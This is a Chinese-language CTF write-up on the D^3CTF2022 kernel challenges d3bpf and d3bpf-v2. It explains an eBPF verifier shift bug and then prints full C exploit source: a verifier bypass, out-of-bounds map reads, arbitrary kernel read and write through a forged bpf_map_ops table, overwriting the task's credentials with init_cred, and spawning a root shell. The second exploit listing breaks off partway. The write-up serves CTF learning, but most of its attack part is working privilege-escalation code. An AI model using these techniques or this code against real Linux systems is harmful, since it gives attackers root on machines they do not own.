【ebpf pwn】D^3CTF2022 -- d3bpf/d3bpf-v2

前言

题目链接

虽然 ebpf 的利用热潮已经过去,但是作为一个刚刚接触内核利用的菜鸡,还是觉得有必要学习学习 ebpf 相关的漏洞利用,当然笔者不会在此花费太多时间,之前复现过几个 CVE,发现对于边界类越界漏洞的利用都大同小异。然后笔者找到了两个 CTF 中的题目来练习练习。

d3bpf

smep/smap/kaslr 全开,然后内核版本为 v5.11.0,这题有非预期,作者忘记 patch cve-2021-3490

qemu-system-x86_64 \
    -m 128M \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -append 'console=ttyS0 kaslr quiet' \
    -monitor /dev/null \
    -cpu kvm64,+smep,+smap \
    -smp cores=1,threads=1 \
    -nographic \
    -s

然后人为 patch 了一个漏洞:

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 37581919e..8e98d4af5 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -6455,11 +6455,11 @@ static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                        scalar_min_max_lsh(dst_reg, &src_reg);
                break;
        case BPF_RSH:
-               if (umax_val >= insn_bitness) {
-                       /* Shifts greater than 31 or 63 are undefined.
-                        * This includes shifts by a negative number.
-                        */
-                       mark_reg_unknown(env, regs, insn->dst_reg);
+               if (umin_val >= insn_bitness) {
+                       if (alu32)
+                               __mark_reg32_known(dst_reg, 0);
+                       else
+                               __mark_reg_known_zero(dst_reg);
                        break;
                }
                if (alu32)

X86_64 下,对于 64 位寄存器进行右移操作时,如果操作数大于 63,那么大于 63 的部分会被忽略(也就是只有操作数的低 6 位是有效的),所以这里的利用是针对架构的。但是在漏洞分支中,当操作数大于 63/31 时,直接将寄存器设置成了常数 0,那么这里是存在问题的,比如:

BPF_MOV64_IMM(BPF_REG_8, 64),
BPF_ALU64_REG(BPF_RSH, BPF_REG_6, BPF_REG_8),

那么这里会直接将 R6 设置为 0,但是如果我们传入的 R6 = 1,那么 1 >> 64 还是等于 1,所以这里就成功构造了一个验证时为 0,实际运行时为 1 的寄存器 R6,后面的利用就比较套路了。

这里说一下,为什么不直接执行:BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 64),因为会报错:

12: (77) r6 >>= 64
invalid shift 64

这里会检查到 64shift 是无效的。当然这里大家可以思考一下如下代码:

// gcc demo.c
#include <stdio.h>
#include <stdlib.h>
int main() {
        unsigned long long a = 1;
        unsigned long long b = a >> 64;
        unsigned long long c = 1ULL >> 64;

        printf("b = %llu\nc = %llu\n", b, c);
        return 0;
}
/*
输出:
b = 1
c = 0
*/

提示:这里可以直接 objdump 看下这两个移位操作对应的汇编指令,当然或许已经被优化的看不出来了

这里我重新编译了一个 v5.11.0 的内核方便调试,最后 exp 如下:

v5.11.0alu_limit 的计算是存在漏洞的,所以这里不需要进行绕过

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"


void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(2);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(2);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

static inline int bpf(int cmd, union bpf_attr *attr)
{
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
        union bpf_attr attr = {
                .map_type = map_type,
                .key_size = key_size,
                .value_size = value_size,
                .max_entries = max_entries,
        };
        return bpf(BPF_MAP_CREATE, &attr);
}

static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
        };
        return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
                .flags = flags,
        };
        return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
        };
        return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .next_key = (uint64_t)next_key,
        };
        return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
        struct bpf_map_info info;
        union bpf_attr attr = {
                .info.bpf_fd = map_fd,
                .info.info_len = sizeof(info),
                .info.info = (uint64_t)&info,

        };
        bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
        return info.btf_id;
}

int sockets[2];
int map_fd;
int expmap_fd;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
uint64_t array_map_ops = 0xffffffff822362e0;
uint64_t init_cred = 0xffffffff82e891a0;
uint64_t init_task = 0xffffffff82e1b400;
uint64_t init_nsproxy = 0xffffffff82e88f60;
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;


struct bpf_insn prog[] = {

        BPF_LD_MAP_FD(BPF_REG_1, 3),    // r1 = [map_fd] = bpf_map ptr1
        BPF_MOV64_IMM(BPF_REG_6, 0),    // r6 = 0
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(uint64_t*)(fp - 8) = r6 = 0
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_10),           // r7 = r10 = fp
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8),          // r7 = r7 - 8 = fp - 8
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),            // r2 = r7 = fp - 8
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr1, r2 = fp - 8
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                          // if r0 <= r0 goto pc+1 right
        BPF_EXIT_INSN(),                                                // exit
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),                            // r9 = r0 = value_buf1 ptr
        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0),                   // r6 = *(uint64_t*)r9 = value_buf1[0] = 1
        BPF_MOV64_IMM(BPF_REG_8, 64),                                   // r8 = 64
        BPF_ALU64_REG(BPF_RSH, BPF_REG_6, BPF_REG_8),                   // r6 = r6 >> 64 = 1 >> 64 = 1 [verifier 0]

        BPF_LD_MAP_FD(BPF_REG_1, 4),                                    // r1 = [expmap_fd] = bpf_map ptr2
        BPF_MOV64_IMM(BPF_REG_8, 0),                                    // r8 = 0
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8),                 // *(uint64_t*)(fp - 8) = r8 = 0
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_10),                           // r7 = r10 = fp
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8),                          // r7 = r7 - 8 = fp - 8
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),                            // r2 = r7 = fp - 8
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr2, r2 = fp - 8
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                          // if r0 <= r0 goto pc+1 right
        BPF_EXIT_INSN(),                                                // exit
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),                            // r7 = r0 = value_buf2 addr


        BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),                       // r6 = r6 * 0x110 = 1 * 0x110 = 0x110


        BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),                   // r7 = r7 - r6 = value_buf2 addr - 0x110
        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),                   // r8 = *(uint64_t*)r7 = value_buf2[-0x110/8] = array_map_ops

        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18),                // *(uint64_t*)(r9 +0x18) = value_buf1[3] = r8 = array_map_ops
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_8),                            // r2 = r8 = array_map_ops

        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0),                // r8 = *(uint64_t*)(r7 +0xc0) = value_buf2[-(0x110-0xc0)/8] = map_addr
        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20),                // *(uint64_t*)(r9 +0x20) = value_buf1[4] = r8 = map_addr

        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8),                   // r8 = *(uint64_t*)(r9 +8) = value_buf1[1] = arb_read addr
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1),                          // if arb_read addr == NULL goto pc+1
        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40),                // *(uint64_t*)(r7 +0x40) = value_buf2[-(0x110-0x40)/8] = btf = r8

        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10),                // r8 = value_buf1[2] = fake_ops
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4),                          // if arb_write flag == 0 goto pc+4
        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),                   // expmap's bpf_map_ops = r8 = fake_ops
        BPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK),         // map_type = BPF_MAP_TYPE_STACK
        BPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1),                         // max_entries = -1
        BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0),                          // spin_lock_off = 0
        BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

};

#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };

union bpf_attr attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insns = (uint64_t) &prog,
    .insn_cnt = sizeof(prog) / sizeof(prog[0]),
    .license = (uint64_t) "GPL",
    .log_level = 2,
    .log_buf = (uint64_t) bpf_log_buf,
    .log_size = BPF_LOG_SZ,
};


void init() {
        setbuf(stdin, NULL);
        setbuf(stdout, NULL);
        setbuf(stderr, NULL);
}

void trigger() {
        char buffer[64];
        write(sockets[0], buffer, sizeof(buffer));
}

void prep() {

        value1 = (uint64_t*)calloc(0x2000, 1);
        value2 = (uint64_t*)calloc(0x2000, 1);
        prctl(PR_SET_NAME, "XiaozaYa");

        map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
        if (map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
        if (expmap_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        prog_fd = bpf(BPF_PROG_LOAD, &attr);
        if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");

        if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
                perror("socketpair()"), err_exit("socketpair()");

        if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
                perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
//        puts(bpf_log_buf);
}

uint32_t arb_read_4_byte(uint64_t addr) {
        value1[0] = 1;
        value1[1] = addr - 0x58;
        value1[2] = 0;
        bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
        bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
        trigger();
        return bpf_map_get_info_by_fd(expmap_fd);
}

uint64_t arb_read(uint64_t addr) {
        uint64_t lo = arb_read_4_byte(addr);
        uint64_t hi = arb_read_4_byte(addr+4);
        return (hi << 32) | lo;
}

void prep_arb_write() {

        uint64_t buf[0x200/8] = { 0 };
        value1[0] = 1;
        value1[1] = 0;
        value1[2] = map_addr+0x110+0x20;

        uint64_t fake_ops[] = {
                0x0,0x0,0x0,0x0,
  0xffffffff81239770,
  0xffffffff8123ac60,
  0x0,
  0xffffffff8123a060,
  0xffffffff81239870,
  0x0,
  0x0,
  0xffffffff81217cf0,
  0x0,
  0xffffffff81217ac0,
  0x0,
  0xffffffff812399f0,
  0xffffffff81239f20,
  0xffffffff812398b0,
  0xffffffff81239870,
  0x0,
  0x0,
  0x0,
  0x0,
  0xffffffff8123a530,
  0x0,
  0xffffffff81239d00,
  0xffffffff8123a930,
  0x0,
  0x0,
  0x0,
  0xffffffff81239800,
  0xffffffff81239830,
  0xffffffff81239c90,
  0x0,
  0x0,
  0x0,
  0x0,
  0xffffffff8123a8f0,
  0xffffffff825cef67,
  0xffffffff836b4880,
  0xffffffff82236420
        };

        for (int i = 0; i < sizeof(fake_ops) / 8; i++) {
                if (fake_ops[i]) fake_ops[i] += koffset;
        }

        memcpy(value2, fake_ops, sizeof(fake_ops));
        bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
        bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);

        trigger();
}

void arb_write_4_byte(uint64_t addr, uint32_t val) {

        value2[0] = val - 1;
        bpf_map_update_elem(expmap_fd, &key, value2, addr);
}

void arb_write(uint64_t addr, uint64_t val) {
        arb_write_4_byte(addr, val&0xffffffff);
        arb_write_4_byte(addr+4, (val>>32)&0xffffffff);
}

void leak() {

        uint64_t buf[0x2000/8] = { 0 };
        value1[0] = 1;
        value1[1] = 0;
        value1[2] = 0;
        bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
        bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
        trigger();

        memset(buf, 0, sizeof(buf));
        bpf_map_lookup_elem(map_fd, &key, buf);
//        binary_dump("LEAK DATA", buf, 0x100);

        if ((buf[3] & 0xffffffff00000fff) == (array_map_ops & 0xffffffff00000fff)) {
                koffset = buf[3] - array_map_ops;
                kbase = 0xffffffff81000000 + koffset;
                map_addr = buf[4] - 0xc0;
                hexx("koffset", koffset);
                hexx("kbase", kbase);
                hexx("map_addr", map_addr);
        }

        if (koffset == -1) err_exit("FAILED to leak kernel base");
        array_map_ops += koffset;
        init_cred += koffset;
        init_task += koffset;
        init_nsproxy += koffset;
        hexx("init_cred", init_cred);
        hexx("init_task", init_task);
        hexx("init_nsproxy", init_nsproxy);

        current_task = init_task;
        for (;;) {
//              hexx("current_task", current_task);
                if (arb_read(current_task+0xae8) == tag) {
                        break;
                }
                current_task = arb_read(current_task + 0x820) - 0x818;
        }
        hexx("current_task", current_task);

}

int main(int argc, char** argv, char** envp)
{

        init();
        prep();
        leak();
        prep_arb_write();

        arb_write_4_byte(current_task+0xad8, init_cred&0xffffffff);
        arb_write_4_byte(current_task+0xad8+2, (init_cred>>16)&0xffffffff);
        arb_write_4_byte(current_task+0xad0, init_cred&0xffffffff);
        arb_write_4_byte(current_task+0xad0+2, (init_cred>>16)&0xffffffff);
        arb_write_4_byte(current_task+0xb40, init_nsproxy&0xffffffff);
        arb_write_4_byte(current_task+0xb40+2, (init_nsproxy>>16)&0xffffffff);
        get_root_shell();

        puts("EXP NERVER END!");
        return 0;
}

效果如下:
在这里插入图片描述

d3bpf-v2

d3bpf 漏洞一模一样,主要就是内核版本切换到了 v5.16.12,在这个版本 ALU Sanitation 经过了两次加强:

  • alu_limit 的计算方式发生了改变,不是使用指针寄存器的当前位置,而是使用一个 offset 寄存器
  • 被认为是常数的寄存器赋值会被直接更改为常量赋值

所以之前的绕过方式已经不再管用了,这里展示了一个思路:利用 bpf_skb_load_bytes 函数构造栈溢出修改 ebpfarray value ptr 实现任意地址读写

bpf_skb_load_bytes 函数定义如下:其将一个 socket 中的数据读到 ebpf 栈上

BPF_CALL_4(bpf_skb_load_bytes, const struct sk_buff *, skb, u32, offset,
	   void *, to, u32, len)
{
	void *ptr;

	if (unlikely(offset > 0xffff))
		goto err_clear;

	ptr = skb_header_pointer(skb, offset, len, to);
	if (unlikely(!ptr))
		goto err_clear;
	if (ptr != to)
		memcpy(to, ptr, len);

	return 0;
err_clear:
	memset(to, 0, len);
	return -EFAULT;
}

static const struct bpf_func_proto bpf_skb_load_bytes_proto = {
	.func		= bpf_skb_load_bytes,
	.gpl_only	= false,
	.ret_type	= RET_INTEGER,
	.arg1_type	= ARG_PTR_TO_CTX,
	.arg2_type	= ARG_ANYTHING,
	.arg3_type	= ARG_PTR_TO_UNINIT_MEM,
	.arg4_type	= ARG_CONST_SIZE,
}

我们通过漏洞获得一个运行时值为 1,而 verifier 认定为 0 的寄存器 R6,然后可以指定一个很长的 len 从而实现 ebpf 栈溢出,而且值得注意的是这里复制数据采用的函数是 memcpy,其是不存在 \x00 截断的。

泄漏 map_addr

我们可以先将 map value ptr 保存到 ebpf 栈上:

BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_9, -8),                 // *(fp -8) = value1 ptr

然后利用 R6 构造栈溢出 2 字节的 len 修改保存在 ebpf 栈上的 value1 ptr 的低 2 字节为 \x?0\xc0 取泄漏 map_addr。这里说下理由,我们知道 map_addr 的低 2 字节为 \x?0\x00,而 map_addr+0xc0 的位置是 wait_list,其保存着 map_addr 的地址,即 wait_list 的低 2 字节为 \x?0\xc0,这样我们可以检查 value1[0] 是否是一个堆地址且 &0xfff == 0x0c0 这样就可以泄漏 map_addr 了:
在这里插入图片描述

泄漏 koffset

泄漏了 map_addr 后就比较简单了,利用 R6 构造栈溢出 8 字节的 len 修改保存在 ebpf 栈上的 value1 ptrmap_addr 即可泄漏出 array_map_ops 中的函数地址从而泄漏 koffset

任意地址读写

泄漏了 koffset 后,init_task/init_cred 等地址就知道了,对于任意读跟泄漏 koffset 一样,利用 R6 构造栈溢出 8 字节的 len 修改保存在 ebpf 栈上的 value1 ptrtarget_addr 即可,利用任意读,我们遍历 init_tasktasks 链表泄漏 current_task 地址

然后同理利用 R6 构造栈溢出 8 字节的 len 修改保存在 ebpf 栈上的 value1 ptrtarget_addr 即可实现任意写,这里我们直接修改 current_taskcred/real_credinit_cred 即可

exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"


void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(2);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(2);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

static inline int bpf(int cmd, union bpf_attr *attr)
{
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
        union bpf_attr attr = {
                .map_type = map_type,
                .key_size = key_size,
                .value_size = value_size,
                .max_entries = max_entries,
        };
        return bpf(BPF_MAP_CREATE, &attr);
}

static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
        };
        return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
                .flags = flags,
        };
        return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
        };
        return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .next_key = (uint64_t)next_key,
        };
        return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
        struct bpf_map_info info;
        union bpf_attr attr = {
                .info.bpf_fd = map_fd,
                .info.info_len = sizeof(info),
                .info.info = (uint64_t)&info,

        };
        bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
        return info.btf_id;
}

int sockets[2];
int map_fd1;
int map_fd2;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
char trigger_buf[0x2000];
uint64_t array_map_ops = 0xffffffff82238f20;
uint64_t init_cred = 0xffffffff82e90880;
uint64_t init_task = 0xffffffff82e1b4c0;
uint64_t init_nsproxy = 0xffffffff82e90640;
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;


struct bpf_insn prog[] = {

        BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),                            // r7 = ctx
        BPF_LD_MAP_FD(BPF_REG_1, 3),                                    // r1 = [map_fd1]
        BPF_MOV64_IMM(BPF_REG_6, 0),                                    // r6 = 0
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8),                 // *(fp -8) = 0
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                           // r2 = fp
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),                          // r2 = fp - 8
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map1 ptr, r2 = fp - 8
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                          // if r0 <= r0 goto pc+1 right
        BPF_EXIT_INSN(),                                                // exit
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),                            // r9 = value1 ptr

        BPF_LD_MAP_FD(BPF_REG_1, 4),                                    // r1 = [map_fd2]
        BPF_MOV64_IMM(BPF_REG_5, 0),                                    // r5 = 0
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_5, -8),                 // *(fp -8) = 0
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                           // r2 = fp
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),                          // r2 = fp - 8
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map2 ptr, r2 = fp - 8
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                          // if r0 <= r0 goto pc+1 right
        BPF_EXIT_INSN(),                                                // exit
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),                            // r8 = value2 ptr


        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_9, -8),                 // *(fp -8) = value1 ptr

        BPF_MOV64_IMM(BPF_REG_6, 1),                                    // r6 = 1
        BPF_MOV64_IMM(BPF_REG_5, 64),                                   // r8 = 64
        BPF_ALU64_REG(BPF_RSH, BPF_REG_6, BPF_REG_5),                   // r6 = r6 >> 64 = 1 >> 64 = 1 [verifier 0]

        BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 0),                   // r5 = value2[0] = len
        BPF_JMP_IMM(BPF_JNE, BPF_REG_5, 0xdead, 2),                     // leak map_addr
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 2),                           // r6 = 2 [verifier 0]
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_5, 0xdead, 1),                     // jmp
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 8),                           // r6 = 8 [verifier 0]

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),                            // r1 = ctx
        BPF_MOV64_IMM(BPF_REG_2, 0),                                    // r2 = 0
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),                           // r3 = fp
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),                         // r3 = fp -8
        BPF_MOV64_IMM(BPF_REG_4, 8),                                    // r4 = 8
        BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_6),                   // r4 = 10 [verifier 8]
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes), // args: r1 = ctx, r2 = 0, r3 = fp -8, r4 = 10 [verifier 8]

        BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_10, -8),                 // r9 = value1 ptr

        BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_8, 0),                   // r5 = value2[0] = len
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xdead, 4),                     // jmp
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xbeef, 3),                     // jmp
        BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 8),                   // r5 = value2[1]
        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_5, 0),                   // value1[0] = value2[0]
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xdeef, 2),
        BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_9, 0),                   // r5 = value1[0]
        BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_5, 0),                   // value2[0] = value1[0]


        BPF_MOV64_IMM(BPF_REG_0, 0),                                    // r0 = 0
        BPF_EXIT_INSN(),                                                // exit()
};

#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };

union bpf_attr attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insns = (uint64_t) &prog,
    .insn_cnt = sizeof(prog) / sizeof(prog[0]),
    .license = (uint64_t) "GPL",
    .log_level = 2,
    .log_buf = (uint64_t) bpf_log_buf,
    .log_size = BPF_LOG_SZ,
};


void init() {
        setbuf(stdin, NULL);
